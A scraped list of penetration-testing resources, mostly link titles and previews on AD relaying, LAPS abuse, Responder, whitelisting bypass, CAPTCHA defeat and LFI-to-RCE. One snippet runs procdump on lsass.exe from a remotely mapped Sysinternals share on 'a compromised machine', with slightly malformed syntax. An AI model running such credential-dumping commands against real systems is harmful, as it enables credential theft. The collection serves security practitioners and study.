unCaptcha2:-
defeating the latest version of ReCaptcha with 91% accuracy.
Demo:
https://user-images.githubusercontent.com/14065974/45004579-df021180-afbb-11e8-8598-177159ed09b4.gif
https://github.com/ecthros/uncaptcha2
defeating the latest version of ReCaptcha with 91% accuracy.
Demo:
https://user-images.githubusercontent.com/14065974/45004579-df021180-afbb-11e8-8598-177159ed09b4.gif
https://github.com/ecthros/uncaptcha2
windowsblindread
A list of files / paths to probe when arbitrary files can be read on a Microsoft Windows operating system
https://github.com/soffensive/windowsblindread
A list of files / paths to probe when arbitrary files can be read on a Microsoft Windows operating system
https://github.com/soffensive/windowsblindread
GitHub
GitHub - soffensive/windowsblindread: A list of files / paths to probe when arbitrary files can be read on a Microsoft Windows…
A list of files / paths to probe when arbitrary files can be read on a Microsoft Windows operating system - soffensive/windowsblindread
Malicious use of Microsoft LAPS
https://akijosberryblog.wordpress.com/2019/01/01/malicious-use-of-microsoft-laps/
https://akijosberryblog.wordpress.com/2019/01/01/malicious-use-of-microsoft-laps/
Akijosberry
Malicious use of Microsoft LAPS
LAPS Overview: LAPS (Local Administrator Password Solution) is a tool for managing local administrator passwords for domain joined computers. It stores passwords/secrets in a confidential attribute…
Effective NTLM / SMB Relaying
https://room362.com/post/2014/2014-05-21-effective-ntlm-slash-smb-relaying/
https://room362.com/post/2014/2014-05-21-effective-ntlm-slash-smb-relaying/
Room362
Effective NTLM / SMB Relaying · Rob 'mubix' Fuller
SMB Relay has been around for a long while. I even have a post about using it along with LNK files here:
MS08-068 + MS10-046 = Fun until 2018
Here is the problem though. Most of the tools to exploit it either catch the authentication in NTLMv2/NTLMv1 (which…
MS08-068 + MS10-046 = Fun until 2018
Here is the problem though. Most of the tools to exploit it either catch the authentication in NTLMv2/NTLMv1 (which…
Fun with LDAP, Kerberos (and MSRPC) in AD Environments
https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments
https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments
Speaker Deck
Fun with LDAP, Kerberos (and MSRPC) in AD Environments
Slides from my Track X Thotcon 2018 Workshop entitled:
"Fun with LDAP, Kerberos (and MSRPC) in AD Environments"
If you want the embedded Gifs/Vide…
"Fun with LDAP, Kerberos (and MSRPC) in AD Environments"
If you want the embedded Gifs/Vide…
Interesting vuln allows attacker to bypass auth for android phone by taking a Skype call ☎️ 🔓
https://youtu.be/EiEcwOfTFqI
https://youtu.be/EiEcwOfTFqI
YouTube
Skype Android Authentication Bypass
Skype Android Authentication Bypass
Florian Kunushevci
https://www.linkedin.com/in/floriankunushevci/
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0622
Florian Kunushevci
https://www.linkedin.com/in/floriankunushevci/
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0622
Map #Sysinternals tools folder locally, run tools when required. Useful on a compromised remote machine to avoid tool clutter.
net use Z: \\http://live.sysinternals.com \tools\ "/user:"
dir Z:
Z:\procdump -accepteula -ma lsass.exe lsassdmp
net use Z: \\http://live.sysinternals.com \tools\ "/user:"
dir Z:
Z:\procdump -accepteula -ma lsass.exe lsassdmp
Pwning with Responder – A Pentester’s Guide
https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
WMIC.EXE Whitelisting Bypass - Hacking with Style, Stylesheets
https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html
https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html
Mobile Application Penetration Testing Cheat Sheet
https://github.com/sh4hin/MobileApp-Pentest-Cheatsheet
https://github.com/sh4hin/MobileApp-Pentest-Cheatsheet
GitHub
GitHub - sh4hin/MobileApp-Pentest-Cheatsheet: The Mobile App Pentest cheat sheet was created to provide concise collection of high…
The Mobile App Pentest cheat sheet was created to provide concise collection of high value information on specific mobile application penetration testing topics. - sh4hin/MobileApp-Pentest-Cheatsheet
SMTP Log Poisioning through LFI to Remote Code Exceution
https://www.hackingarticles.in/smtp-log-poisioning-through-lfi-to-remote-code-exceution/
https://www.hackingarticles.in/smtp-log-poisioning-through-lfi-to-remote-code-exceution/
Hacking Articles
SMTP Log Poisoning through LFI to Remote Code Execution - Hacking Articles
In this Post, we will be discussing on SMTP log poisoning. But before getting in details, kindly read our previous articles for “SMTP Lab Set-Up”